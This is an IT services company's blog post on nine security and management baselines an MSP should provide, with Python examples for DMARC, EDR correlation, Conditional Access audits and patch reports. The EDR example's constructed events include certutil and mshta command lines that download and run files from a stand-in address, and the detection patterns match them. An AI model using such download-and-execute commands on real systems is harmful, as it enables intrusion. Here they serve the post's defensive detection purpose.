Why Your IT Partner Should Be Offering You This (And What to Ask If They're Not)
field note · IT Strategy

Nine things a competent 2026 IT partner should be doing for you, and the questions to ask if your MSP isn't, without burning the relationship.

Cathleen Ogier · founder · 08 May 2026 · 9 min read

At year one, your IT partner was enthusiastic. They sent a 12-page scope of work. They had opinions about your backup strategy. They followed up twice.

By year five, the invoice processes automatically. The last proactive communication you got from them was a price increase. When you ask how things are going, the answer is “fine.”

“Fine” is doing a lot of work in that sentence.

Threats don’t stay fine. The compliance bar moves. Microsoft and Google ship security features you’re already paying for and nobody switches them on. A partner who isn’t pushing those into your environment is, functionally, being paid to stand still. The problem isn’t that they’ve turned malicious. It’s that they’ve turned furniture.

Nine things follow. Not gold-plating. The floor. If your partner is doing all nine, you have a good one and none of this is about you. If they’re not, the conversation script at the bottom is how you raise it without turning the next review into a tribunal.

DMARC monitoring and management: are you covered?

The 2026 minimum is a record at p=reject. Not p=none, which is the email security equivalent of installing a smoke detector and removing the battery because the beeping was annoying. p=none monitors. p=quarantine sends failures to spam and is a reasonable stepping stone. p=reject protects. A comfortable partner rarely explains the difference.

What we find on inherited tenants: p=none published in 2021 and never moved. The reporting address pointing at an aggregator account the previous IT person stopped logging into two years ago. Phishing impersonating the domain still reaching customers, because the policy says “do nothing” and that is exactly what happens.

If your partner set up DMARC once and moved on, ask for the current policy tag and where the reports go. The TamingDNS DMARC analyser shows you the same view in about 30 seconds. So will they, if they’re across it.
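The check described above, as an added example that is not part of the original article or of any TamingDNS tool: it parses a DMARC TXT record, reports the policy tag and the report destinations, and lists every gap against the p=reject baseline. The two sample records are constructed for the example, and the `lookup_dmarc` helper assumes the `dig` CLI is installed and is not needed for the offline samples.

```python
"""Added example: grade a DMARC TXT record against the p=reject baseline and show where reports go."""
import re
import subprocess

# Constructed records for the example: the inherited-tenant case and the target state.
SAMPLE_RECORDS = {
    "inherited": "v=DMARC1; p=none; rua=mailto:dmarc@old-msp.example; pct=100",
    "baseline": ("v=DMARC1; p=reject; sp=reject; "
                 "rua=mailto:dmarc-agg@example.com,mailto:dmarc@reports.example.net!10m; "
                 "ruf=mailto:dmarc-forensic@example.com"),
}


def parse_dmarc(txt):
    """Split 'v=DMARC1; p=none; rua=...' into a dict keyed by lowercased tag name."""
    tags = {}
    for part in txt.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def assess_dmarc(txt, domain=None):
    """Return the policy tag, the report destinations and every gap against the 2026 baseline."""
    result = {"policy": "", "report_addresses": [], "verify": [], "gaps": [], "meets_baseline": False}
    if not txt.strip().lower().startswith("v=dmarc1"):
        result["gaps"].append("not a DMARC record: v=DMARC1 must be the first tag")
        return result
    tags = parse_dmarc(txt)
    p = result["policy"] = tags.get("p", "").lower()
    if p == "none":
        result["gaps"].append("p=none: receivers only report, spoofed mail is still delivered")
    elif p == "quarantine":
        result["gaps"].append("p=quarantine: failures land in spam instead of being rejected")
    elif p != "reject":
        result["gaps"].append(f"p={p or '<missing>'}: no valid policy")
    pct = tags.get("pct", "100")
    if pct != "100":
        result["gaps"].append(f"pct={pct}: the policy applies to only {pct}% of failing mail")
    sp = tags.get("sp", "").lower()
    if sp and sp != "reject":
        result["gaps"].append(f"sp={sp}: subdomains get a weaker policy than the organisational domain")
    # rua holds the aggregate-report destinations; a trailing !10m is an optional size limit.
    addrs = result["report_addresses"] = re.findall(r"mailto:([^,\s;!]+)", tags.get("rua", ""))
    if not addrs:
        result["gaps"].append("no rua tag: aggregate reports are not being sent anywhere")
    if domain:
        for addr in addrs:
            rdom = addr.rsplit("@", 1)[-1].lower()
            if rdom != domain.lower() and not rdom.endswith("." + domain.lower()):
                # RFC 7489 s7.1: receivers only send reports off-domain if rdom publishes a TXT record
                # at <domain>._report._dmarc.<rdom> authorising it. Confirm that record exists.
                result["verify"].append(rdom)
    result["meets_baseline"] = p == "reject" and pct == "100" and sp in ("", "reject") and bool(addrs)
    return result


def lookup_dmarc(domain):
    """Live lookup with the dig CLI (needs dig and network); not used by the offline samples."""
    out = subprocess.run(["dig", "+short", "TXT", f"_dmarc.{domain}"],
                         capture_output=True, text=True, check=True).stdout
    # dig prints each TXT record quoted; long records come as several quoted strings joined by spaces.
    return [line.strip().strip('"').replace('" "', "") for line in out.splitlines() if "DMARC1" in line]


if __name__ == "__main__":
    for name, record in SAMPLE_RECORDS.items():
        print(name, assess_dmarc(record, domain="example.com"))
```

The `verify` list is the part people miss: when reports go to an aggregator on another domain, that domain has to publish the `_report._dmarc` authorisation record or receivers silently drop the reports, which looks exactly like the "nobody is reading them" case.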

If you want another reason to get to p=reject, read Cyber Insurance and DMARC: What Underwriters Actually Want to See.

EDR, not just AV: what is actually on your endpoints?

Antivirus catches commodity malware on signature. Endpoint Detection and Response records the process tree, command-line activity, registry changes and network connections, then correlates them into something a human analyst can read.

The attacks we respond to now almost never trip a signature. They use signed Windows binaries (certutil.exe, bitsadmin.exe, mshta.exe, the living-off-the-land set) in sequences antivirus reads as normal binaries doing normal things. EDR reads the sequence: the Word process that spawned the downloader, the file it wrote, the process that ran it a minute later. That’s the difference between catching something and writing the incident report.
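What "reading the sequence" means in practice, as an added example that is not from the article or from any EDR vendor: the code below walks a handful of process-creation events, remembers the files that signed downloaders wrote to disk, and raises a high-severity alert only when one of those files is executed on the same host shortly afterwards. The events are constructed for the example (Sysmon-style fields, a documentation IP range), and the command-line patterns cover the certutil and bitsadmin download forms named in the text.

```python
"""Added example: correlate process-creation events the way EDR does, instead of judging one binary at a time."""
import ntpath
import re
from datetime import datetime, timedelta

CHAIN_WINDOW = timedelta(minutes=15)
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe",
                "certutil.exe", "bitsadmin.exe"}
# Command-line shapes in which these signed Windows binaries fetch a URL and write the result to disk.
DOWNLOADERS = {
    "certutil.exe": re.compile(r"-urlcache\b.*\s-f\s+(?P<url>https?://\S+)\s+(?P<out>\S+)", re.I),
    "bitsadmin.exe": re.compile(r"/transfer\s.*?(?P<url>https?://\S+)\s+(?P<out>\S+)", re.I),
}
MSHTA_REMOTE = re.compile(r"(?:https?://|vbscript:|javascript:)", re.I)

# Constructed Sysmon-style process-creation events, not from a real incident.
# 203.0.113.0/24 is a documentation range, so the "attacker" address routes nowhere.
EVENTS = [
    {"ts": "2026-05-04T09:12:03", "host": "LT-FIN-07", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://203.0.113.5/up.txt C:\Users\Public\up.exe"},
    {"ts": "2026-05-04T09:12:41", "host": "LT-FIN-07", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\Public\up.exe", "cmdline": r"C:\Users\Public\up.exe"},
    {"ts": "2026-05-04T10:03:15", "host": "SRV-APP-02", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -verify C:\certs\intranet.cer"},       # legitimate admin use
    {"ts": "2026-05-04T11:20:00", "host": "LT-HR-03",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\mshta.exe", "cmdline": "mshta.exe https://203.0.113.5/launch.hta"},
]


def _name(path):
    return ntpath.basename(path).lower()


def analyse(events):
    """Walk events in time order, remember files dropped by downloaders, and flag when they later run."""
    alerts, staged = [], {}          # staged: (host, dropped path) -> time of the download
    for e in sorted(events, key=lambda x: x["ts"]):
        ts, image, parent = datetime.fromisoformat(e["ts"]), _name(e["image"]), _name(e["parent"])

        def alert(severity, rule, detail):
            alerts.append({"severity": severity, "rule": rule, "host": e["host"], "ts": e["ts"], "detail": detail})

        pattern = DOWNLOADERS.get(image)
        match = pattern.search(e["cmdline"]) if pattern else None
        if match:                    # certutil -verify on a cert never gets here: no URL, no output file
            staged[(e["host"], match["out"].lower())] = ts
            alert("medium", "lolbin-download", f"{image} fetched {match['url']} to {match['out']}")
        if image == "mshta.exe" and MSHTA_REMOTE.search(e["cmdline"]):
            alert("high", "mshta-remote-script", e["cmdline"])
        if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
            alert("high", "office-spawns-script-host", f"{parent} launched {image}")
        dropped_at = staged.get((e["host"], e["image"].lower()))
        if dropped_at is not None and ts - dropped_at <= CHAIN_WINDOW:
            alert("high", "download-then-execute",
                  f"{e['image']} ran {int((ts - dropped_at).total_seconds())}s after a LOLBin wrote it")
    return alerts


if __name__ == "__main__":
    for a in analyse(EVENTS):
        print(a["severity"].upper(), a["host"], a["ts"], a["rule"], "-", a["detail"])
```

The server's certutil run produces nothing, because it has no URL and writes no file; the laptop's certutil run is only medium on its own, and becomes high when the file it wrote is executed 38 seconds later. Signature AV sees two separate, signed, legitimate binaries in both cases.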

A competent partner has EDR on every endpoint (macOS and Linux servers included) with a named human watching the alerts. If the answer to “what are we running on endpoints?” is “you’ve got antivirus, you’re covered,” that’s a 2018 answer to a 2026 threat picture.

For the broader Bitdefender picture, see the Bitdefender page.

Conditional Access and MFA enforcement: is it actually enforced?

MFA switched on is not the same as MFA enforced. Eight out of ten M365 Business Premium tenants we audit have at least one Conditional Access gap. Usually a service account excluded three years ago for convenience and forgotten since. Sometimes there is still no policy blocking legacy authentication, so a stolen password presented through a client that only speaks basic authentication is accepted and the MFA prompt never fires at all.

The 2026 baseline: legacy authentication blocked tenant-wide, MFA required for all users, a compliant device required for desktop access to Exchange and SharePoint, phishing-resistant MFA for admins, and no exclusions beyond a documented break-glass account. Tested quarterly for drift: the policies do not rewrite themselves, but the tenant around them changes, with new accounts created outside the targeted groups, “temporary” exclusions that become permanent, and new apps that fall outside the policy scope.

Ask for a one-page diagram of your current Conditional Access policies. If your partner can’t produce one, the policies aren’t being managed. They’re being assumed.
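The drift review described above, as an added example that is not from the article or from Microsoft: it takes an export of Conditional Access policies and reports which baseline items an enforced policy actually covers, which policies are report-only, and which exclusions exist beyond the break-glass account. The three policies are constructed for the example and assume the shape of Microsoft Graph `conditionalAccessPolicy` objects (trimmed, with readable labels in place of object GUIDs); the Global Administrator role template id and the built-in phishing-resistant authentication strength id are Microsoft's published constants.

```python
"""Added example: audit exported Conditional Access policies for the baseline and for drift."""

GLOBAL_ADMIN_ROLE = "62e90394-69f5-4237-9190-012177145e10"   # Entra role template id: Global Administrator
PHISHING_RESISTANT = "00000000-0000-0000-0000-000000000004"  # built-in authentication strength: Phishing-resistant MFA
LEGACY_CLIENTS = {"exchangeActiveSync", "other"}              # clientAppTypes that make up "legacy authentication"

# Constructed export (assumed Graph conditionalAccess policy shape, trimmed). Real exports carry
# object GUIDs in includeUsers/excludeUsers; readable labels are used so the findings are legible.
POLICIES = [
    {"displayName": "CA001 Block legacy authentication", "state": "enabled",
     "conditions": {"users": {"includeUsers": ["All"], "excludeUsers": []},
                    "applications": {"includeApplications": ["All"]},
                    "clientAppTypes": ["exchangeActiveSync", "other"]},
     "grantControls": {"operator": "OR", "builtInControls": ["block"]}},
    {"displayName": "CA002 Require MFA for all users", "state": "enabled",
     "conditions": {"users": {"includeUsers": ["All"], "excludeUsers": ["breakglass-01", "svc-scanner"],
                              "excludeGroups": []},
                    "applications": {"includeApplications": ["All"]},
                    "clientAppTypes": ["all"]},
     "grantControls": {"operator": "OR", "builtInControls": ["mfa"]}},
    {"displayName": "CA003 Admins phishing-resistant MFA", "state": "enabledForReportingButNotEnforced",
     "conditions": {"users": {"includeUsers": [], "excludeUsers": [], "includeRoles": [GLOBAL_ADMIN_ROLE]},
                    "applications": {"includeApplications": ["All"]},
                    "clientAppTypes": ["all"]},
     "grantControls": {"operator": "OR", "builtInControls": [],
                       "authenticationStrength": {"id": PHISHING_RESISTANT, "displayName": "Phishing-resistant MFA"}}},
]


def _users(p):
    return p["conditions"]["users"]


def _controls(p):
    return set((p.get("grantControls") or {}).get("builtInControls") or [])


def _strength(p):
    return ((p.get("grantControls") or {}).get("authenticationStrength") or {}).get("id")


def _all_users_all_apps(p):
    return ("All" in _users(p).get("includeUsers", [])
            and "All" in p["conditions"]["applications"].get("includeApplications", []))


def audit(policies, break_glass=frozenset()):
    """Return what the enforced policies cover and the gaps a quarterly drift review should raise."""
    ok, gaps = [], []
    live = [p for p in policies if p.get("state") == "enabled"]   # report-only and disabled enforce nothing
    for p in policies:
        if p.get("state") == "enabledForReportingButNotEnforced":
            gaps.append(f"{p['displayName']}: report-only, it enforces nothing")
    if any(LEGACY_CLIENTS <= set(p["conditions"].get("clientAppTypes", [])) and _all_users_all_apps(p)
           and "block" in _controls(p) for p in live):
        ok.append("legacy authentication blocked tenant-wide")
    else:
        gaps.append("no enforced policy blocks legacy authentication for all users")
    if any(_all_users_all_apps(p) and ("mfa" in _controls(p) or _strength(p)) for p in live):
        ok.append("MFA required for all users on all apps")
    else:
        gaps.append("no enforced policy requires MFA for all users")
    if any(GLOBAL_ADMIN_ROLE in _users(p).get("includeRoles", []) and _strength(p) == PHISHING_RESISTANT
           for p in live):
        ok.append("Global Administrators require phishing-resistant MFA")
    else:
        gaps.append("no enforced policy requires phishing-resistant MFA for Global Administrators")
    for p in live:   # every exclusion beyond break-glass is the "service account from three years ago"
        extra = sorted(set(_users(p).get("excludeUsers", [])) - set(break_glass))
        if extra:
            gaps.append(f"{p['displayName']}: excludes {extra} beyond the break-glass account(s)")
        if _users(p).get("excludeGroups"):
            gaps.append(f"{p['displayName']}: excludes groups {_users(p)['excludeGroups']}; review their membership")
    return {"ok": ok, "gaps": gaps}


if __name__ == "__main__":
    for section, lines in audit(POLICIES, break_glass={"breakglass-01"}).items():
        print(section.upper(), *lines, sep="\n  ")
```

Run against this constructed tenant, the legacy-auth block and the all-users MFA policy pass, the admin policy is flagged because it was left in report-only mode, and `svc-scanner` surfaces as an exclusion nobody can account for. The compliant-device requirement from the baseline follows the same pattern (a `compliantDevice` grant control scoped to desktop client types) and is left out here only for length.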

The walkthrough is on the Microsoft 365 page.

Quarterly licence right-sizing: who is watching the bill?

Microsoft and Google sell on the assumption that nobody looks closely. On every tenant we audit there is at least one of the following: Business Premium seats assigned to accounts that left 18 months ago, E3 licences on frontline staff who have never opened Outlook, archive add-ons paid for and never used, Teams Phone licences on accounts that have never made a call.

On a 100-seat tenant the savings from a proper audit typically pay for the audit several times over. A competent partner runs this at every renewal without being asked and sends a written summary: what each user is licensed for, what they actually use, what should change.

If yours has never produced this report, the savings have been sitting in your invoice undisturbed. Ask for it.

Encrypted endpoints with managed recovery keys: where are they stored?

Every laptop should have full disk encryption running. BitLocker on Windows, FileVault on macOS. The interesting question isn’t whether encryption is on. It’s where the recovery key lives.

Recovery keys belong in a system the business controls and can audit: Intune for M365 shops, Hexnode for mixed fleets, GravityZone for endpoint-managed environments. Exportable, auditable, and recoverable on a Sunday evening when someone forgets their password before a Monday board meeting, which is when these situations reliably occur.

What we still find in 2026: laptops encrypted, recovery key escrowed only in the user’s personal Microsoft account. The day they leave, nobody in the business can unlock that disk; it gets wiped and reused, and anything on it that wasn’t backed up elsewhere is gone. Ask where your recovery keys are. The answer should name a specific console, not gesture vaguely at the cloud.

The full picture is on the MDM page, and the trade-off between products is covered at FDE: Bitdefender vs Intune.

Periodic SaaS backup verification: do you have a tested restore?

Microsoft 365 and Google Workspace back up their own infrastructure, not your data. Content deleted by a user, a script, or a departing employee is recoverable only for the platform’s native window, and then it is gone: in Exchange Online the deleted-item recovery window defaults to 14 days (configurable up to 30), SharePoint and OneDrive recycle bins hold items for 93 days, and a Google Workspace admin can restore permanently deleted Drive files and Gmail messages for 25 days. Retention policies and Vault can hold content longer, but they are retention controls, not point-in-time copies you can restore from.

A third-party backup product (Acronis, Datto, Druva, AvePoint, Spanning) addresses this. The licence alone is not the answer. A tested restore is: a document showing the date of the last test, the data scope, what was restored and to where, the time it took, and the engineer who ran it.

Most partners we audit have the licence. Very few have ever run a restore test. Ask for the most recent restore-test report. If it doesn’t exist, the backup doesn’t really exist in any operational sense.

Patching reports you actually read: when did Chrome last update?

The most common cause of compromise in our incident-response work is not a zero-day. It’s an unpatched browser plugin or PDF reader where the CVE was published six weeks earlier, the patch was available, and nobody pushed it.

A 2026 partner runs patch management for the OS and the third-party long tail: Chrome, Adobe Reader, Zoom, 7-Zip, and the line-of-business apps with their own opaque release cadences. Monthly reports show coverage by app, by patch age, and by endpoint, so you can see how long a fix sat unapplied and where. A monthly email that says “everything is fine” without a report attached is not patch management. It is optimism dressed as a status update.
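What that report is made of, as an added example that is not from the article or from any RMM product: it joins an application inventory (one row per endpoint per app, the shape an RMM or EDR export gives you) to a table of current releases, compares versions numerically, and reports coverage per app, how many days each lagging endpoint has been missing an available fix, and which endpoints are past the agreed patch SLA. The inventory, the version numbers and the release dates are constructed for the example and are not real vendor data.

```python
"""Added example: turn an app inventory into the coverage / patch-age / endpoint view a monthly report carries."""
from datetime import date

REPORT_DATE = date(2026, 5, 8)

# Constructed release table: (current version, date it shipped). Illustrative values, not real vendor data.
LATEST = {
    "Chrome": ("136.0.7103.92", date(2026, 4, 21)),
    "Adobe Reader": ("25.1.20467", date(2026, 4, 8)),
    "7-Zip": ("24.09", date(2026, 2, 6)),
}

# Constructed inventory as an RMM or EDR export would give it: one row per endpoint per app.
INVENTORY = [
    {"endpoint": "LT-01", "app": "Chrome", "version": "136.0.7103.92"},
    {"endpoint": "LT-01", "app": "Adobe Reader", "version": "25.1.20467"},
    {"endpoint": "LT-01", "app": "7-Zip", "version": "24.09"},
    {"endpoint": "LT-02", "app": "Chrome", "version": "135.0.7049.114"},
    {"endpoint": "LT-02", "app": "Adobe Reader", "version": "25.1.20467"},
    {"endpoint": "LT-02", "app": "7-Zip", "version": "23.01"},
    {"endpoint": "LT-03", "app": "Chrome", "version": "136.0.7103.92"},
    {"endpoint": "LT-03", "app": "Adobe Reader", "version": "24.5.20320"},
    {"endpoint": "LT-03", "app": "7-Zip", "version": "24.09"},
]


def vtuple(version):
    """Compare dotted versions numerically, so 24.09 < 24.10 and 136.0.7103.92 > 135.0.7049.114."""
    return tuple(int(part) for part in version.split("."))


def patch_report(inventory, latest, today):
    """Per app: endpoint count, how many run the current release, and who is behind for how long."""
    by_app = {}
    for row in inventory:
        app = row["app"]
        current, released = latest[app]
        entry = by_app.setdefault(app, {"endpoints": 0, "on_current": 0, "behind": []})
        entry["endpoints"] += 1
        if vtuple(row["version"]) < vtuple(current):
            # Age = days the fix has been available and not applied: the window an attacker gets.
            entry["behind"].append({"endpoint": row["endpoint"], "version": row["version"],
                                    "age_days": (today - released).days})
        else:
            entry["on_current"] += 1
    for entry in by_app.values():
        entry["coverage_pct"] = round(100 * entry["on_current"] / entry["endpoints"])
        entry["worst_age_days"] = max((b["age_days"] for b in entry["behind"]), default=0)
    return by_app


def exposed(report, max_age_days):
    """(endpoint, app, age) for every endpoint missing an available patch longer than the SLA allows."""
    return sorted((b["endpoint"], app, b["age_days"])
                  for app, entry in report.items() for b in entry["behind"]
                  if b["age_days"] > max_age_days)


if __name__ == "__main__":
    report = patch_report(INVENTORY, LATEST, REPORT_DATE)
    for app, entry in report.items():
        print(f"{app}: {entry['coverage_pct']}% current, worst lag {entry['worst_age_days']} days")
    print("over 14-day SLA:", exposed(report, 14))
```

The six-weeks-old-CVE case from the text is exactly what `worst_age_days` surfaces: the fix shipped, the endpoint never took it, and the number on the report is how long that gap has been open.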

The Bitdefender setup is covered in our patch management documentation; the Intune approach lives on the Microsoft 365 page.

A documented incident-response plan: what happens at 2am?

The first thing a cyber-insurance underwriter asks for, after the policy posture, is the incident-response plan. The second is the date of the last tabletop exercise.

A real IR plan names specific people with specific contact numbers, defines who declares an incident, who calls breach counsel, who notifies the Information Regulator under POPIA Section 22. It has a runbook for the scenarios that actually happen: ransomware on a laptop, a forwarding rule on a CFO mailbox, a token replay against an admin account. Dated, signed, and rehearsed at least once a year with the people named in it.

If your partner’s IR plan is a Word document from 2019, ask for the current version. If there isn’t one, you are improvising at 2am. That’s a hard way to find out what you actually have.

Honest answers about lock-in: who owns the keys?

Who is the global admin on your M365 tenant? Whose name is on the domain registrar account? Where are your DNS records hosted and who can change them? If the relationship ended next month, what does the exit actually look like?

A trustworthy partner answers all of this plainly, in writing, without a three-day delay. Licences billed through them as a Cloud Solution Provider, but the tenant belongs to the client. DNS in an account the client controls. Break-glass credentials sealed and held by the client. Exit ramp documented in the contract from day one.

A partner who goes quiet on any of these has structured the engagement to favour themselves. That’s not automatically malicious. Worth knowing before you need to know it.

What to ask if they’re not doing this

You don’t have to make this a confrontation. Most partners respond well to a client who has done the reading and arrives with specific questions rather than vague dissatisfaction. Bring receipts, not accusations.

Ask these in writing at your next review:

  1. “Show me our DMARC posture: the policy tag, where reports go, when we last moved the policy.”
  2. “What’s our EDR coverage by operating system (Windows, macOS, Linux servers), and who reads the alerts?”
  3. “Send me the most recent licence right-sizing report.”
  4. “Where are our recovery keys? Which console, which export path, which named owner?”
  5. “When did we last test a SaaS restore? Date, scope, engineer.”
  6. “Send me last month’s patch report: coverage by app, by patch age, by endpoint, third-party apps included.”
  7. “Send me the current incident-response plan, dated.”
  8. “Walk me through our Conditional Access policies: what blocks legacy authentication, who is excluded and why, and when drift was last checked.”
  9. “What does our exit look like if we end the relationship?”

Take notes. A partner who comes back with a costed remediation plan is worth keeping. One who tells you “it’s fine” without showing the receipts has a contract that’s overdue for review.

Where OSH fits in

We wrote this because we keep inheriting the aftermath of partners who weren’t doing these nine things. We deploy and manage M365, Google Workspace, DMARC, GravityZone, Hexnode and Intune for South African and international SMEs as a Cloud Solution Provider, with the keys where they belong and reports landing in the client’s inbox monthly. How we engage is set out on the services and professional services pages.

Get a free 60-minute IT-partner quality assessment

Book a 60-minute call. We map your current coverage against the nine items above, produce a written gap report, and name the three things your current partner should be doing differently. Yours to keep whether you engage us or not.

If your partner is doing all nine, you get a written confirmation that’s useful at your next cyber-insurance renewal. If not, you have the receipts for the conversation above.

Email support@osh.co.za or use the form on the contact page.

More in this series: Reseller vs Direct

  1. Reseller or Direct? When to Buy Cloud Software From a Partner vs the Vendor
  2. Why Your IT Partner Should Be Offering You This (And What to Ask If They're Not) (Current)
  3. How to Lock Down Your Reseller From Owning Your Stuff
